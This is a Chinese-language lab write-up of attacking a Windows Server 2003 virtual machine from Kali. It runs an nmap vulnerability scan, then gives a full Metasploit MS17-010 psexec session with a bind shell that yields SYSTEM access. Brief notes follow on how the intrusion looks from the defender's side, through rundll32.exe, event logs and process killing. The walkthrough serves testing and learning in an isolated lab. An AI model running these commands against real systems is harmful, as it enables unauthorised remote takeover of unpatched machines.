使用kali下的msf對windows 2003進行測試
測試環境:
windows 2003 192.168.145.132
kali: 192.168.145.146
使用kali查看windows2003下開放的端口以及對應端口是否存在漏洞:
nmap --script=vuln 192.168.145.132
root@kali:~# nmap --script=vuln 192.168.145.132
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-01 23:26 EDT
Nmap scan report for bogon (192.168.145.132)
Host is up (0.0033s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
MAC Address: 00:0C:29:3E:BE:DF (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds
可以看到,存在ms-08-067、ms17-010漏洞
下面以ms17-010爲例。
啓動msf並獲得了遠程主機權限:msfconsole
msf5 > search ms17-010
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.145.132
rhosts => 192.168.145.132
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 192.168.145.132:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.145.132:445 - Filling barrel with fish... done
[*] 192.168.145.132:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.145.132:445 - [*] Preparing dynamite...
[*] 192.168.145.132:445 - Trying stick 1 (x64)...Miss
[*] 192.168.145.132:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.145.132:445 - [+] Successfully Leaked Transaction!
[*] 192.168.145.132:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.145.132:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.145.132:445 - Reading from CONNECTION struct at: 0x87107010
[*] 192.168.145.132:445 - Built a write-what-where primitive...
[+] 192.168.145.132:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.145.132:445 - Selecting native target
[*] 192.168.145.132:445 - Uploading payload... PAPySZMA.exe
[*] 192.168.145.132:445 - Created \PAPySZMA.exe...
[+] 192.168.145.132:445 - Service started successfully...
[*] 192.168.145.132:445 - Deleting \PAPySZMA.exe...
[*] Started bind TCP handler against 192.168.145.132:4444
[*] Command shell session 1 opened (192.168.145.146:40349 -> 192.168.145.132:4444) at 2019-07-02 02:56:09 -0400
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��������:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.145.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.145.2
查看windows 2003的網絡連接情況,找到連接記錄。
添加登陸用戶,添加成功,但是系統上沒有任何添加的記錄
安全性裏面出現匿名登陸。
查找進程,是rundll32.exe,該進程是一個可以執行DLL文件內的代碼的Microsoft二進制文件。由於此實用程序是Windows操作系統的一部分,因此可以將其用作一種繞過AppLocker規則或軟件限制策略的方法。所以如果系統環境沒有正確的鎖定某些設置,那麼用戶就可以使用這個二進制文件做一些事情,他們也可以編寫自己的DLL,來繞過任何限制或執行惡意的JavaScript代碼:
直接殺死該進程
kali下程序依然可以運行
查看網絡連接狀態,發現PID依然沒有變,但是該進程查找不到了。
查看事件管理器裏面,安全性未發現異常,系統發現異常,存在perfomance logs and alerts服務的狀態信息。
重啓windows 2003 ,kali退出
在windows 2003下安裝進程查看工具procexp查看程序,當kali執行程序時,會自動出現rundll32.exe程序以及一個cmd子進程;如果只刪除rundll32.exe的話,則依然可以執行命令,只有把子進程一起刪除,遠程控制段程序才能退出。